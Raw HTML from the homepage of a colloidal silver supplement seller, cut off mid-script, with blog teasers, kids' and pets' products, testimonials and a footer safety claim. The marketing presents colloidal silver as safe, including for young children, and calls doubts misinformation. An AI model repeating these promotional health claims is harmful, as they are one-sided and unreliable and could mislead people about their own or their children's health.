sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Apr 10, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/how-to-get-your-kids-excited-about-being-healthy/">How To Get Your Kids Excited About Being Healthy</a></h3><p class="text-excerpt">It’s not easy to keep a child healthy in today’s world but we've got a few tips to get your kids excited about it to make it easier to do so!</p><div class="post-btn"><a href="https://sovereignsilver.com/how-to-get-your-kids-excited-about-being-healthy/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/the-truth-about-colloidal-silver-safety/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/03/Truth-About-Colloidal-Silver-WEB.png" class="attachment-full size-full wp-post-image lazyload" alt="surreal image of a woman holding clouds" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Mar 28, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/the-truth-about-colloidal-silver-safety/">The Truth About Colloidal Silver Safety</a></h3><p class="text-excerpt">With all the talk and misinformation about colloidal silver, many people question whether taking colloidal silver is actually safe.  In this article, we’ll discuss the do’s and don’ts of colloidal silver, and whether it can benefit you and your family.</p><div class="post-btn"><a href="https://sovereignsilver.com/the-truth-about-colloidal-silver-safety/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/one-bottle-one-tree/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/03/Plant-A-Tree-Save-A-Life.png" class="attachment-full size-full wp-post-image lazyload" alt="Picture of a Sovereign Silver bottle in a tree" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Mar 25, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/one-bottle-one-tree/">One Bottle. One Tree.</a></h3><p class="text-excerpt">How does planting a tree help our environment? Our newest blog explains how as well as how YOU can easily contribute to reforestation efforts!</p><div class="post-btn"><a href="https://sovereignsilver.com/one-bottle-one-tree/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/5-little-known-colloidal-silver-facts/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/03/Little-Known-Colloidal-Silver-Facts.png" class="attachment-full size-full wp-post-image lazyload" alt="Picture showing Myths and Facts text" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Mar 22, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/5-little-known-colloidal-silver-facts/">5 Little Known Colloidal Silver Facts</a></h3><p class="text-excerpt">When it comes to colloidal silver, there is a lot of misinformation that people take at face value without doing the research.  In this article, we’ll separate fact from fiction and discuss a few of the most confusing myths about colloidal silver.</p><div class="post-btn"><a href="https://sovereignsilver.com/5-little-known-colloidal-silver-facts/">Read More</a></div></div></div></div></div></div></div><div class="row-fluid full-width product-section"><div class="container-fluid"><div class="page-head"><h2>Featured Products</h2></div><div class="row product-row"><div class="col-md-3 col-sm-6"><div class="product-grid"><div class="product-inner"><div class="product-image"> <img width="360" height="479" data-srcset="https://sovereignsilver.com/wp-content/uploads/2017/12/4oz_SS_Box-360x479.jpg 360w, https://sovereignsilver.com/wp-content/uploads/2017/12/4oz_SS_Box-225x300.jpg 225w, https://sovereignsilver.com/wp-content/uploads/2017/12/4oz_SS_Box.jpg 601w" data-src="https://sovereignsilver.com/wp-content/uploads/2017/12/4oz_SS_Box-360x479.jpg" class="attachment-shop_catalog size-shop_catalog wp-post-image lazyload" alt="" sizes="100vw" style="--aspect-ratio:0.75156576200418;" /></div><div class="product-img-overlay"><div class="hs-container"><div class="hs-content"><div class="prd-btn"><a href="https://sovereignsilver.com/product/bio-active-silver-hydrosol-dropper-top/">Select options</a></div></div></div></div> <a href="https://sovereignsilver.com/product/bio-active-silver-hydrosol-dropper-top/" class="prd-over-link"></a></div><div class="product-content"><h4><a href="https://sovereignsilver.com/product/bio-active-silver-hydrosol-dropper-top/">Bio-Active Silver Hydrosol &#8211; Dropper-Top</a></h4><div class="productprice"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>14.99</span> &ndash; <span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>35.99</span></div></div></div></div><div class="col-md-3 col-sm-6"><div class="product-grid"><div class="product-inner"><div class="product-image"> <img width="360" height="481" data-srcset="https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Kids_2oz_Mist_web-360x481.png 360w, https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Kids_2oz_Mist_web-225x300.png 225w, https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Kids_2oz_Mist_web.png 599w" data-src="https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Kids_2oz_Mist_web-360x481.png" class="attachment-shop_catalog size-shop_catalog wp-post-image lazyload" alt="" sizes="100vw" style="--aspect-ratio:0.74844074844075;" /></div><div class="product-img-overlay"><div class="hs-container"><div class="hs-content"><div class="prd-btn"><a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/">Select options</a></div></div></div></div> <a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/" class="prd-over-link"></a></div><div class="product-content"><h4><a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/">Sovereign Silver Kids &#8211; Fine Mist Spray</a></h4><div class="productprice"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>14.99</span></div></div></div></div><div class="col-md-3 col-sm-6"><div class="product-grid"><div class="product-inner"><div class="product-image"> <img width="360" height="480" data-srcset="https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Pets_4oz_Drops_web-360x480.png 360w, https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Pets_4oz_Drops_web-225x300.png 225w, https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Pets_4oz_Drops_web.png 600w" data-src="https://sovereignsilver.com/wp-content/uploads/2017/09/SS_Pets_4oz_Drops_web-360x480.png" class="attachment-shop_catalog size-shop_catalog wp-post-image lazyload" alt="" sizes="100vw" style="--aspect-ratio:0.75;" /></div><div class="product-img-overlay"><div class="hs-container"><div class="hs-content"><div class="prd-btn"><a href="https://sovereignsilver.com/product/sovereign-silver-pets-dropper-top/">Select options</a></div></div></div></div> <a href="https://sovereignsilver.com/product/sovereign-silver-pets-dropper-top/" class="prd-over-link"></a></div><div class="product-content"><h4><a href="https://sovereignsilver.com/product/sovereign-silver-pets-dropper-top/">Sovereign Silver Pets &#8211; Dropper-Top</a></h4><div class="productprice"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>23.99</span></div></div></div></div><div class="col-md-3 col-sm-6"><div class="product-grid"><div class="product-inner"><div class="product-image"> <img width="360" height="480" data-srcset="https://sovereignsilver.com/wp-content/uploads/2017/08/silver-first-aid-gel-2oz-360x480.jpg 360w, https://sovereignsilver.com/wp-content/uploads/2017/08/silver-first-aid-gel-2oz-225x300.jpg 225w, https://sovereignsilver.com/wp-content/uploads/2017/08/silver-first-aid-gel-2oz-180x240.jpg 180w, https://sovereignsilver.com/wp-content/uploads/2017/08/silver-first-aid-gel-2oz.jpg 600w" data-src="https://sovereignsilver.com/wp-content/uploads/2017/08/silver-first-aid-gel-2oz-360x480.jpg" class="attachment-shop_catalog size-shop_catalog wp-post-image lazyload" alt="" sizes="100vw" style="--aspect-ratio:0.75;" /></div><div class="product-img-overlay"><div class="hs-container"><div class="hs-content"><div class="prd-btn"><a href="https://sovereignsilver.com/product/silver-first-aid-gel/">Select options</a></div></div></div></div> <a href="https://sovereignsilver.com/product/silver-first-aid-gel/" class="prd-over-link"></a></div><div class="product-content"><h4><a href="https://sovereignsilver.com/product/silver-first-aid-gel/">Silver First Aid Gel</a></h4><div class="productprice"><span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>14.99</span> &ndash; <span class="woocommerce-Price-amount amount"><span class="woocommerce-Price-currencySymbol">&#36;</span>22.99</span></div></div></div></div></div><div class="col-xs-12"><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_other_full_color swp_individual_full_color scale-100 scale-full_width" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_google_plus" data-network="google_plus"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://plus.google.com/share?url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://plus.google.com/share?url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_google_plus_icon"></i><span class="swp_share">+1</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Share</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=Home&url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://twitter.com/intent/tweet?text=Home&url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tweet</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fsovereignsilver.com%2F" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fsovereignsilver.com%2F"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Share</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_pinterest" data-network="pinterest"><a rel="nofollow noreferrer noopener" class="nc_tweet swp_share_link noPop" onClick="var e=document.createElement('script'); e.setAttribute('type','text/javascript'); e.setAttribute('charset','UTF-8'); e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999); document.body.appendChild(e); " ><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_pinterest_icon"></i><span class="swp_share">Pin</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_email" data-network="email"><a class="nc_tweet noPop swp_share_link" rel="nofollow noreferrer noopener" href="mailto:?subject=Home&body=%0D%0A%0D%0ARead More Here: %20https%3A%2F%2Fsovereignsilver.com%2F" target="_blank"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_email_icon"></i><span class="swp_share">Email</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button total_shares total_sharesalt" ><span class="swp_count ">5K <span class="swp_label">Shares</span></span></div></div></div></div></div><div class="row-fluid full-width testimonial-section"><div class="container-fluid"><div id="owl-testimonial" class="owl-carousel"><div class="item"> <a class="testim_link" href="https://sovereignsilver.com/testimonials/"> I don't know what I ever did without this product! I heard about it for years before trying and I'm now I rave about it to everyone...I take it on the airplane and spray my mouth… </a><hr class="split" /><div class="author-details"><h5>J. Powell</h5></div></div><div class="item"> <a class="testim_link" href="https://sovereignsilver.com/testimonials/"> There is nothing bad to say about this brand! It is so worth always having a bottle on hand. Love, love, love this stuff!!! </a><hr class="split" /><div class="author-details"><h5>Sara B.</h5></div></div><div class="item"> <a class="testim_link" href="https://sovereignsilver.com/testimonials/"> I am so in love with this stuff!...it tastes like water...I even gave it to my 8 and 6 year old. </a><hr class="split" /><div class="author-details"><h5>Elizabeth J.</h5></div></div><div class="item"> <a class="testim_link" href="https://sovereignsilver.com/testimonials/"> Love the Sovereign Silver spray. I take it with me on the plane when I travel... </a><hr class="split" /><div class="author-details"><h5>Nastassia R.</h5></div></div><div class="item"> <a class="testim_link" href="https://sovereignsilver.com/testimonials/"> I've used other colloidal silver's, but this one I can really notice the difference in quality... </a><hr class="split" /><div class="author-details"><h5>Connor</h5></div></div></div><div class="testimonial-button"><a class="testim-btn" href="/testimonials/">See All</a></div></div></div><div class="row-fluid full-width"><div class="container-fluid"><div id="partner_redone" class="col-md-3 col-sm-6 col-xs-12"><div class="item"> <a href="https://sovereignsilver.com/product/bio-active-silver-hydrosol/"><img class="lazyload" data-src="https://sovereignsilver.com/wp-content/uploads/2019/05/Sovereign-Silver-Logo-Transparent.png" alt="Partners Logo"></a></div></div><div id="partner_redone" class="col-md-3 col-sm-6 col-xs-12"><div class="item"> <a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/"><img class="lazyload" data-src="https://sovereignsilver.com/wp-content/uploads/2019/02/SS-for-Kids-op.png" alt="Partners Logo"></a></div></div><div id="partner_redone" class="col-md-3 col-sm-6 col-xs-12"><div class="item"> <a href="https://sovereignsilver.com/product/sovereign-silver-for-pets/"><img class="lazyload" data-src="https://sovereignsilver.com/wp-content/uploads/2019/02/SS-for-Pets-op.png" alt="Partners Logo"></a></div></div><div id="partner_redone" class="col-md-3 col-sm-6 col-xs-12"><div class="item"> <a href="https://sovereignsilver.com/argentyn-23-for-practitioners/"><img class="lazyload" data-src="https://sovereignsilver.com/wp-content/uploads/2019/02/argentyn-logo-2-op.png" alt="Partners Logo"></a></div></div></div></div></div><div class="footer row-fluid"><div class="container-fluid"><div class="footer-inner"><div class="row"><div class="col-sm-3"><h4>Learn More</h4><ul id="menu-footer-learn-more" class=""><li id="menu-item-2738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-10 current_page_item menu-item-2738"><a href="https://sovereignsilver.com/" aria-current="page">Home</a></li><li id="menu-item-221" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-221"><a href="https://sovereignsilver.com/shop/">Our Products</a></li><li id="menu-item-2739" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2739"><a href="https://sovereignsilver.com/our-science/">Our Science</a></li><li id="menu-item-224" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-224"><a href="https://sovereignsilver.com/the-learning-center/">The Learning Center</a></li><li id="menu-item-2112" class="menu-item menu-item-type-taxonomy menu-item-object-knowledgebase_category menu-item-2112"><a href="https://sovereignsilver.com/wiki/knowledge_library/">The Knowledge Library</a></li><li id="menu-item-2740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2740"><a href="https://sovereignsilver.com/faqs/">FAQs</a></li><li id="menu-item-2111" class="menu-item menu-item-type-post_type menu-item-object-knowledgebase menu-item-2111"><a href="https://sovereignsilver.com/knowledgebase/glossary/">Glossary</a></li><li id="menu-item-2741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2741"><a href="https://sovereignsilver.com/blog/">SOVEREIGN LIFE <sup>TM</sup><br /> Our blog to help you live your best sovereign life</a></li></ul></div><div class="col-sm-3"><h4>Company</h4><ul id="menu-footer-company" class=""><li id="menu-item-2742" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2742"><a href="https://sovereignsilver.com/our-story/">Our Story</a></li><li id="menu-item-25413" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-25413"><a href="https://workforcenow.adp.com/jobs/apply/posting.html?client=N-ICorp&#038;ccId=19000101_000001&#038;type=MP&#038;lang=en_US">Careers</a></li><li id="menu-item-27091" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-27091"><a target="_blank" href="https://naturalimmunogenics.com/">Natural Immunogenics</a></li><li id="menu-item-2743" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2743"><a href="https://sovereignsilver.com/argentyn-23-for-practitioners/">Argentyn 23 – For Practitioners</a></li></ul></div><div class="col-sm-3"><h4>Support</h4><ul id="menu-footer-support" class=""><li id="menu-item-2745" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2745"><a href="https://sovereignsilver.com/my-account/">My account</a></li><li id="menu-item-231" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-231"><a href="https://sovereignsilver.com/my-account/">Register/Login</a></li><li id="menu-item-2779" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2779"><a href="https://sovereignsilver.com/contact-us/">Contact Us</a></li><li id="menu-item-2746" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2746"><a href="https://sovereignsilver.com/store-locator/">Store Locator</a></li><li id="menu-item-38868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38868"><a href="https://sovereignsilver.com/return-policy/">Return Policy</a></li><li id="menu-item-2778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2778"><a href="https://sovereignsilver.com/privacy-policy/">Privacy Policy</a></li></ul></div><div class="col-sm-3"><h4>Connect</h4><div class="a2a_kit a2a_kit_size_32 a2a_follow addtoany_list"><a class="a2a_button_facebook" href="https://www.facebook.com/sovereignsilver/" title="Facebook" rel="noopener" target="_blank"></a><a class="a2a_button_twitter" href="https://twitter.com/SovereignSilvr" title="Twitter" rel="noopener" target="_blank"></a><a class="a2a_button_instagram" href="https://www.instagram.com/sovereignsilver/" title="Instagram" rel="noopener" target="_blank"></a><a class="a2a_button_linkedin_company" href="https://www.linkedin.com/company/natural-immunogenics-corp" title="LinkedIn Company" rel="noopener" target="_blank"></a></div><div class="textwidget"><p><script src="https://dx425.infusionsoft.com/app/webTracking/getTrackingCode?b=1.70.0.72808" type="text/javascript" async></script></p><div id="webformErrors" class="text"></div><form id="inf_form_37e017e309d16b72de99602c2aa4558b" class="infusion-soft-form" accept-charset="UTF-8" action="https://dx425.infusionsoft.com/app/form/process/37e017e309d16b72de99602c2aa4558b" method="POST" name="Web Form submitted- HOMEPAGE"><div style="display: none;"><input name="inf_form_xid" type="hidden" value="37e017e309d16b72de99602c2aa4558b" /><br /> <input name="inf_form_name" type="hidden" value="Web Form submitted- HOMEPAGE" /><br /> <input name="infusionsoft_version" type="hidden" value="1.70.0.72808" /></div><h4>Join The Sovereign Life Community</h4><p>Be the first to know about our special promotions, product news, contests and our latest healthy living articles!</p><p><input id="inf_field_FirstName" class="infusion-field-input" name="inf_field_FirstName" type="text" placeholder="First Name *" /></p><p><input id="inf_field_Email" class="infusion-field-input" name="inf_field_Email" type="text" placeholder="Email *" /></p><p style="font-size: 8pt;">We respect your privacy and do not share our email list with anyone. Please see our privacy policy for more information.</p><p><button type="submit" value="Yes! Sign me up!">Yes! Sign me up!</button></p></form><p><script type="text/javascript" src="https://dx425.infusionsoft.com/app/webTracking/getTrackingCode" async></script><br /> <script type="text/javascript" src="https://dx425.infusionsoft.com/app/timezone/timezoneInputJs?xid=37e017e309d16b72de99602c2aa4558b" async></script></p></div></div></div> <br clear="all" /><div class="row btm_ft"><div class="col-md-12"><section id="media_image-2" class="widget widget_media_image"><a href="https://sovereignsilver.com/regulatory-compliance/"><img width="126" height="156" data-src="https://sovereignsilver.com/wp-content/uploads/2017/10/GMP-Registered_Dietary-Supplements_Blue.png" class="image wp-image-2423 attachment-full size-full lazyload" alt="" style="--aspect-ratio:0.80769230769231;" sizes="100vw" /></a></section><section id="text-4" class="widget widget_text"><div class="textwidget"><p>*These statements have not been evaluated by the FDA. This product is not intended to diagnose, treat, cure, or prevent any disease.</p><p>California residents: Proposition 65 requires notifying California consumers of substances in consumer products which might cause cancer, birth defects or other reproductive harm. Natural Immunogenics&#8217; products have been tested and do not require notification.</p><p>† According to the EPA (CASRN 7440-22-4) daily Oral Silver Reference Dose (RfD) applied to 10 ppm, one adult may ingest 178,850 servings safely over 70 years.</p><p>&nbsp;</p><p>©2018 <a href="https://natural-immunogenics.com/">Natural Immunogenics Corp</a>.</p></div></section></div></div></div></div></div><div id="back-top"><a href="#top"><i class="fa fa-angle-up "></i></a></div></div> <noscript> <img height="1" width="1" style="display:none" alt="fbpx" src="https://www.facebook.com/tr?id=848176422050982&ev=PageView&noscript=1"/> </noscript> <script type="application/ld+json">{"@context":"https:\/\/schema.org\/","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"name":"Home","@id":"https:\/\/sovereignsilver.com"}}]}</script> <script type="text/javascript">var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c;</script> <script type="text/javascript">function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); }</script> <script type='text/javascript'>var cnArgs = {"ajaxurl":"https:\/\/sovereignsilver.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.46'></script> <script type='text/javascript'>var gamipress = {"ajaxurl":"\/wp-admin\/admin-ajax.php","achievement_fields":["id","title","link","thumbnail","points_awarded","excerpt","times_earned","steps","toggle","unlock_button","earners","earners_limit","layout"]};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/gamipress/assets/js/gamipress.min.js?ver=1.7.3'></script> <script type='text/javascript'>var gamipress_events = {"ajaxurl":"\/wp-admin\/admin-ajax.php","user_id":"0","post_id":"10","debug_mode":""};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/gamipress/assets/js/gamipress-events.min.js?ver=1.7.3'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8.3' defer='defer'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8.3' defer='defer'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'>var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.2'></script> <script type='text/javascript'>var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_c1fd723d8bd74d1234edfb9b584855ca","fragment_name":"wc_fragments_c1fd723d8bd74d1234edfb9b584855ca","request_timeout":"5000"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.6.2'></script> <script type='text/javascript'>var socialWarfare = {"addons":[{"name":"Social Warfare - Pro","key":"pro","core_required":"3.3.0","product_id":63157,"store_url":"https:\/\/warfareplugins.com","version":"3.6.0","filepath":"\/srv\/bindings\/7da43e4044d04b518ca6106872d37186\/code\/wp-content\/plugins\/social-warfare-pro\/social-warfare-pro.php","license_key":"60ff993ac00db9948edf343de03df8a2","is_registered":true},"pro"],"post_id":"10","floatBeforeContent":""};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.6.0'></script> <script type='text/javascript'>window.lazySizesConfig = window.lazySizesConfig || {};</script> <script type='text/javascript' async="async" src='https://sovereignsilver.com/wp-content/plugins/lazy-load-optimizer/assets/frontend/js/lazysizes.min.js?ver=1.3.4'></script> <script type='text/javascript'>var twentyseventeenScreenReaderText = {"quote":"<svg class=\"icon icon-quote-right\" aria-hidden=\"true\" role=\"img\"> <use href=\"#icon-quote-right\" xlink:href=\"#icon-quote-right\"><\/use> <\/svg>"};</script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_961e5e9a667a0344a28587fc4aea0f98.js?ver=1.0'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_d85d51c8972549cd19b3ba267de879c0.js?ver=1.1'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/uploads/autoptimize/js/autoptimize_single_5aad752f784771787716c49fab954704.js?ver=2.1.2'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/js/isotope.pkgd.min.js'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/js/bootstrap.min.js'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/js/owl.carousel.min.js'></script> <script type='text/javascript' src='https://cdn.rawgit.com/noelboss/featherlight/1.7.13/release/featherlight.min.js'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-content/themes/sovereign-silver/assets/js/product-custom.min.js?ver=1.008'></script> <script type='text/javascript' src='https://sovereignsilver.com/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=".tp-caption.modern_medium_fat_white,.modern_medium_fat_white{color:#fff;font-weight:800;font-size:24px;line-height:20px;font-family:\"Open Sans\",sans-serif;border-width:0px;border-style:none;position:absolute;text-shadow:none;white-space:nowrap}.tp-caption.modern_medium_light,.modern_medium_light{color:#000;font-weight:300;font-size:24px;line-height:20px;font-family:\"Open Sans\",sans-serif;border-width:0px;border-style:none;position:absolute;text-shadow:none;white-space:nowrap}.tp-caption.medium_light_black,.medium_light_black{font-size:30px;line-height:36px;font-weight:300;font-family:\"Open Sans\";color:rgb(0,0,0);text-decoration:none;background-color:transparent;border-width:0px;border-color:rgb(255,214,88);border-style:none}"; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); }</script> <script type="text/javascript">if (setREVStartSize!==undefined) setREVStartSize( {c: '#rev_slider_1_1', responsiveLevels: [1240,1024,778,480], gridwidth: [1240,1024,778,400], gridheight: [576,576,425,240], sliderLayout: 'fullwidth'}); var revapi1, tpj; (function() { if (!/loaded|interactive|complete/.test(document.readyState)) document.addEventListener("DOMContentLoaded",onLoad); else onLoad(); function onLoad() { if (tpj===undefined) { tpj = jQuery; if("off" == "on") 